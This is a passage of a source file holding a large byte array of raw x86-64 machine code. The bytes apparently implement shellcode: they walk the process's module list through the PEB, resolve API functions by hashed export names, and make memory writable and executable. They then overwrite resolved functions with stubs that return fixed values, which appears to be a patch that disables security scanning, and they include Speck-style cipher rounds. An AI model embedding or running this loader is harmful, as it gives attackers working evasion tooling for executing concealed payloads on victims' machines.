1049 | 0x9c, 0x03, 0x00, 0x00, 0x8b, 0x95, 0xb4, 0x01, 0x00, 0x00, 0x48, 0x8b, | |
1050 | 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xa8, | |
1051 | 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40, | |
1052 | 0x18, 0x89, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xd8, 0x01, 0x00, | |
1053 | 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x62, 0x03, | |
1054 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x1c, | |
1055 | 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, | |
1056 | 0x48, 0x89, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, | |
1057 | 0x00, 0x00, 0x8b, 0x40, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, | |
1058 | 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x98, 0x01, 0x00, 0x00, | |
1059 | 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x24, 0x89, 0xc2, | |
1060 | 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, | |
1061 | 0x85, 0x90, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, | |
1062 | 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, | |
1063 | 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x88, 0x01, 0x00, 0x00, 0xc7, 0x85, | |
1064 | 0xdc, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x29, 0x8b, 0x95, | |
1065 | 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x88, 0x01, 0x00, 0x00, 0x48, | |
1066 | 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x89, 0xc2, 0x8b, 0x85, | |
1067 | 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0x60, 0x83, 0x85, 0xdc, 0x01, | |
1068 | 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, | |
1069 | 0x88, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, | |
1070 | 0x75, 0xc0, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05, 0x60, | |
1071 | 0x00, 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x60, | |
1072 | 0x48, 0x89, 0xc1, 0xe8, 0x1d, 0x09, 0x00, 0x00, 0x48, 0x89, 0x85, 0x80, | |
1073 | 0x01, 0x00, 0x00, 0x8b, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01, | |
1074 | 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, | |
1075 | 0x85, 0x98, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2, | |
1076 | 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, | |
1077 | 0x85, 0x78, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00, | |
1078 | 0x48, 0x8b, 0x85, 0x78, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xce, | |
1079 | 0x08, 0x00, 0x00, 0x48, 0x33, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x3b, | |
1080 | 0x85, 0x00, 0x02, 0x00, 0x00, 0x0f, 0x85, 0xfc, 0x01, 0x00, 0x00, 0x8b, | |
1081 | 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d, | |
1082 | 0x14, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, | |
1083 | 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, | |
1084 | 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, | |
1085 | 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, | |
1086 | 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, | |
1087 | 0xd0, 0x01, 0x00, 0x00, 0x48, 0x3b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x0f, | |
1088 | 0x82, 0x99, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x01, 0x00, 0x00, | |
1089 | 0x8b, 0x40, 0x04, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, | |
1090 | 0x48, 0x01, 0xd0, 0x48, 0x3b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x0f, 0x86, | |
1091 | 0x76, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, | |
1092 | 0x89, 0x85, 0x70, 0x01, 0x00, 0x00, 0xc7, 0x85, 0xdc, 0x01, 0x00, 0x00, | |
1093 | 0x00, 0x00, 0x00, 0x00, 0xeb, 0x3b, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, | |
1094 | 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, | |
1095 | 0x10, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0x20, 0x8b, | |
1096 | 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00, | |
1097 | 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x2e, 0x74, 0x29, 0x83, 0x85, | |
1098 | 0xdc, 0x01, 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, | |
1099 | 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, | |
1100 | 0x84, 0xc0, 0x74, 0x0c, 0x83, 0xbd, 0xdc, 0x01, 0x00, 0x00, 0x3b, 0x76, | |
1101 | 0xa5, 0xeb, 0x01, 0x90, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0, | |
1102 | 0x01, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x64, 0x8b, 0x85, 0xdc, 0x01, | |
1103 | 0x00, 0x00, 0x83, 0xc0, 0x02, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x6c, | |
1104 | 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0, 0x03, 0x89, 0xc0, 0xc6, | |
1105 | 0x44, 0x05, 0x20, 0x6c, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0, | |
1106 | 0x04, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x00, 0x8b, 0x85, 0xdc, 0x01, | |
1107 | 0x00, 0x00, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x01, 0x85, 0x70, 0x01, | |
1108 | 0x00, 0x00, 0xc7, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
1109 | 0xeb, 0x24, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, | |
1110 | 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x85, 0xdc, | |
1111 | 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0xa0, 0x83, 0x85, 0xdc, 0x01, 0x00, | |
1112 | 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, | |
1113 | 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, | |
1114 | 0x09, 0x83, 0xbd, 0xdc, 0x01, 0x00, 0x00, 0x7e, 0x76, 0xbc, 0x8b, 0x85, | |
1115 | 0xdc, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05, 0xa0, 0x00, 0x48, 0x8b, 0x85, | |
1116 | 0xf0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8d, 0x55, 0x20, | |
1117 | 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x68, 0x01, 0x00, 0x00, | |
1118 | 0x48, 0x83, 0xbd, 0x68, 0x01, 0x00, 0x00, 0x00, 0x74, 0x21, 0x48, 0x8b, | |
1119 | 0x85, 0xf0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8d, 0x55, | |
1120 | 0xa0, 0x48, 0x8b, 0x8d, 0x68, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, | |
1121 | 0x85, 0xd0, 0x01, 0x00, 0x00, 0xeb, 0x0b, 0x48, 0xc7, 0x85, 0xd0, 0x01, | |
1122 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00, | |
1123 | 0x00, 0xeb, 0x25, 0x83, 0xad, 0xd8, 0x01, 0x00, 0x00, 0x01, 0x83, 0xbd, | |
1124 | 0xd8, 0x01, 0x00, 0x00, 0x00, 0x74, 0x0e, 0x48, 0x83, 0xbd, 0xd0, 0x01, | |
1125 | 0x00, 0x00, 0x00, 0x0f, 0x84, 0x8a, 0xfd, 0xff, 0xff, 0x48, 0x8b, 0x85, | |
1126 | 0xd0, 0x01, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x60, 0x02, 0x00, 0x00, 0x5d, | |
1127 | 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d, | |
1128 | 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0xc7, 0x45, | |
1129 | 0xf0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xdc, 0x60, 0x00, 0x00, 0x00, | |
1130 | 0x8b, 0x45, 0xdc, 0x65, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0xd0, 0x48, | |
1131 | 0x8b, 0x45, 0xd0, 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8b, 0x45, 0xe8, 0x48, | |
1132 | 0x8b, 0x40, 0x18, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xe0, 0x48, | |
1133 | 0x8b, 0x40, 0x10, 0x48, 0x89, 0x45, 0xf8, 0xeb, 0x31, 0x48, 0x8b, 0x45, | |
1134 | 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x4d, 0x20, 0x48, 0x8b, 0x55, | |
1135 | 0x18, 0x49, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, | |
1136 | 0x4d, 0x10, 0xe8, 0x50, 0xfb, 0xff, 0xff, 0x48, 0x89, 0x45, 0xf0, 0x48, | |
1137 | 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, | |
1138 | 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x74, 0x07, 0x48, | |
1139 | 0x83, 0x7d, 0xf0, 0x00, 0x74, 0xbb, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, | |
1140 | 0xc4, 0x50, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, | |
1141 | 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, | |
1142 | 0x48, 0x8b, 0x45, 0x38, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, | |
1143 | 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10, | |
1144 | 0x89, 0x55, 0x18, 0x8b, 0x45, 0x10, 0x0f, 0xaf, 0x45, 0x18, 0x5d, 0xc3, | |
1145 | 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, | |
1146 | 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x30, | |
1147 | 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, | |
1148 | 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x8b, | |
1149 | 0x55, 0x10, 0x8b, 0x45, 0x18, 0x01, 0xd0, 0x5d, 0xc3, 0x55, 0x48, 0x89, | |
1150 | 0xe5, 0x48, 0x83, 0xec, 0x40, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, | |
1151 | 0x10, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, | |
1152 | 0x38, 0x03, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x45, | |
1153 | 0xf8, 0x48, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0x0a, 0xb8, 0x01, 0x00, 0x00, | |
1154 | 0x00, 0xe9, 0x67, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, | |
1155 | 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, 0xac, 0x03, 0x00, | |
1156 | 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0x48, | |
1157 | 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, | |
1158 | 0x39, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x15, 0x46, 0xff, 0xff, 0xff, 0x48, | |
1159 | 0x8d, 0x05, 0x1a, 0xff, 0xff, 0xff, 0x48, 0x29, 0xc2, 0x48, 0x89, 0xd0, | |
1160 | 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79, 0x0a, 0xb8, 0x00, | |
1161 | 0x00, 0x00, 0x00, 0xe9, 0x11, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, | |
1162 | 0x48, 0x8b, 0x40, 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x45, 0xe8, 0x48, | |
1163 | 0x8b, 0x4d, 0xf0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, | |
1164 | 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, | |
1165 | 0xe5, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x48, 0x8b, 0x45, 0xf0, 0x49, | |
1166 | 0x89, 0xd0, 0x48, 0x8d, 0x15, 0xc3, 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc1, | |
1167 | 0xe8, 0x27, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, | |
1168 | 0x60, 0x44, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x4d, 0xe4, | |
1169 | 0x48, 0x8b, 0x4d, 0xf0, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, | |
1170 | 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, 0xbc, 0x03, 0x00, | |
1171 | 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0x48, | |
1172 | 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, | |
1173 | 0x85, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x15, 0xca, 0xfe, 0xff, 0xff, 0x48, | |
1174 | 0x8d, 0x05, 0x9e, 0xfe, 0xff, 0xff, 0x48, 0x29, 0xc2, 0x48, 0x89, 0xd0, | |
1175 | 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79, 0x07, 0xb8, 0x00, | |
1176 | 0x00, 0x00, 0x00, 0xeb, 0x60, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, | |
1177 | 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x45, 0xe8, 0x48, 0x8b, 0x4d, 0xf0, | |
1178 | 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85, | |
1179 | 0xc0, 0x75, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x37, 0x8b, 0x55, | |
1180 | 0xec, 0x48, 0x8b, 0x45, 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x8d, 0x15, 0x4d, | |
1181 | 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x79, 0x02, 0x00, 0x00, 0x48, | |
1182 | 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x60, 0x44, 0x8b, 0x45, 0xe8, 0x8b, | |
1183 | 0x55, 0xec, 0x4c, 0x8d, 0x4d, 0xe4, 0x48, 0x8b, 0x4d, 0xf0, 0xff, 0xd0, | |
1184 | 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x40, 0x5d, 0xc3, 0x55, | |
1185 | 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, | |
1186 | 0x89, 0x45, 0x20, 0x44, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x20, 0xc7, | |
1187 | 0x00, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, | |
1188 | 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x8b, 0x45, | |
1189 | 0x10, 0x2b, 0x45, 0x18, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, | |
1190 | 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0xb8, 0x00, | |
1191 | 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10, | |
1192 | 0x89, 0x55, 0x18, 0x8b, 0x45, 0x10, 0x99, 0xf7, 0x7d, 0x18, 0x5d, 0xc3, | |
1193 | 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x40, 0x48, 0x89, 0x4d, 0x10, | |
1194 | 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x55, 0x10, | |
1195 | 0x48, 0x81, 0xc2, 0x4c, 0x03, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, | |
1196 | 0x48, 0x89, 0x45, 0xf8, 0x48, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0x0a, 0xb8, | |
1197 | 0x01, 0x00, 0x00, 0x00, 0xe9, 0x67, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, | |
1198 | 0x10, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, | |
1199 | 0x5c, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89, | |
1200 | 0x45, 0xf0, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, | |
1201 | 0x00, 0x00, 0xe9, 0x39, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x15, 0x7f, 0xff, | |
1202 | 0xff, 0xff, 0x48, 0x8d, 0x05, 0x61, 0xff, 0xff, 0xff, 0x48, 0x29, 0xc2, | |
1203 | 0x48, 0x89, 0xd0, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79, | |
1204 | 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x11, 0x01, 0x00, 0x00, 0x48, | |
1205 | 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d, | |
1206 | 0x45, 0xe8, 0x48, 0x8b, 0x4d, 0xf0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40, | |
1207 | 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00, 0x00, | |
1208 | 0x00, 0x00, 0xe9, 0xe5, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x48, 0x8b, | |
1209 | 0x45, 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x8d, 0x15, 0x0a, 0xff, 0xff, 0xff, | |
1210 | 0x48, 0x89, 0xc1, 0xe8, 0x20, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, | |
1211 | 0x48, 0x8b, 0x40, 0x60, 0x44, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x4c, | |
1212 | 0x8d, 0x4d, 0xe4, 0x48, 0x8b, 0x4d, 0xf0, 0xff, 0xd0, 0x48, 0x8b, 0x45, | |
1213 | 0x10, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, | |
1214 | 0x7c, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89, | |
1215 | 0x45, 0xf0, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, | |
1216 | 0x00, 0x00, 0xe9, 0x85, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x15, 0xa2, 0xfe, | |
1217 | 0xff, 0xff, 0x48, 0x8d, 0x05, 0x76, 0xfe, 0xff, 0xff, 0x48, 0x29, 0xc2, | |
1218 | 0x48, 0x89, 0xd0, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79, | |
1219 | 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x60, 0x48, 0x8b, 0x45, 0x10, | |
1220 | 0x48, 0x8b, 0x40, 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x45, 0xe8, 0x48, | |
1221 | 0x8b, 0x4d, 0xf0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, | |
1222 | 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, | |
1223 | 0x37, 0x8b, 0x55, 0xec, 0x48, 0x8b, 0x45, 0xf0, 0x49, 0x89, 0xd0, 0x48, | |
1224 | 0x8d, 0x15, 0x25, 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x72, 0x00, | |
1225 | 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x60, 0x44, 0x8b, | |
1226 | 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x4d, 0xe4, 0x48, 0x8b, 0x4d, | |
1227 | 0xf0, 0xff, 0xd0, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x40, | |
1228 | 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5, | |
1229 | 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x4c, | |
1230 | 0x89, 0x45, 0x20, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0xeb, | |
1231 | 0x10, 0x8b, 0x45, 0x18, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf8, 0x88, 0x10, | |
1232 | 0x48, 0x83, 0x45, 0xf8, 0x01, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8d, 0x50, | |
1233 | 0xff, 0x48, 0x89, 0x55, 0x20, 0x48, 0x85, 0xc0, 0x75, 0xdf, 0x48, 0x8b, | |
1234 | 0x45, 0x10, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, | |
1235 | 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, | |
1236 | 0x4c, 0x89, 0x45, 0x20, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, | |
1237 | 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xf0, 0xeb, 0x17, 0x48, 0x8b, | |
1238 | 0x45, 0xf0, 0x0f, 0xb6, 0x10, 0x48, 0x8b, 0x45, 0xf8, 0x88, 0x10, 0x48, | |
1239 | 0x83, 0x45, 0xf8, 0x01, 0x48, 0x83, 0x45, 0xf0, 0x01, 0x48, 0x8b, 0x45, | |
1240 | 0x20, 0x48, 0x8d, 0x50, 0xff, 0x48, 0x89, 0x55, 0x20, 0x48, 0x85, 0xc0, | |
1241 | 0x75, 0xd8, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc4, 0x10, 0x5d, 0xc3, | |
1242 | 0x55, 0x56, 0x53, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x20, 0x48, 0x89, | |
1243 | 0x55, 0x28, 0x4c, 0x89, 0x45, 0x30, 0x48, 0x8b, 0x5d, 0x20, 0x48, 0x8b, | |
1244 | 0x75, 0x28, 0xeb, 0x38, 0x48, 0x89, 0xd8, 0x48, 0x8d, 0x58, 0x01, 0x0f, | |
1245 | 0xb6, 0x10, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x70, 0x01, 0x0f, 0xb6, 0x00, | |
1246 | 0x38, 0xc2, 0x74, 0x20, 0x48, 0x8d, 0x43, 0xff, 0x0f, 0xb6, 0x10, 0x48, | |
1247 | 0x8d, 0x46, 0xff, 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x73, 0x07, 0xb8, 0xff, | |
1248 | 0xff, 0xff, 0xff, 0xeb, 0x1d, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x16, | |
1249 | 0x48, 0x8b, 0x45, 0x30, 0x48, 0x8d, 0x50, 0xff, 0x48, 0x89, 0x55, 0x30, | |
1250 | 0x48, 0x85, 0xc0, 0x75, 0xb7, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5b, 0x5e, | |
1251 | 0x5d, 0xc3, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, | |
1252 | 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18, | |
1253 | 0x48, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, | |
1254 | 0x1f, 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, | |
1255 | 0x48, 0x8b, 0x45, 0x10, 0x48, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0xfc, | |
1256 | 0x89, 0x54, 0x85, 0xe0, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03, | |
1257 | 0x76, 0xdb, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x5e, 0x8b, | |
1258 | 0x45, 0xd8, 0xc1, 0xc8, 0x08, 0x89, 0xc2, 0x8b, 0x45, 0xdc, 0x01, 0xc2, | |
1259 | 0x8b, 0x45, 0xe0, 0x31, 0xd0, 0x89, 0x45, 0xd8, 0x8b, 0x45, 0xdc, 0xc1, | |
1260 | 0xc0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xd8, 0x31, 0xd0, 0x89, 0x45, 0xdc, | |
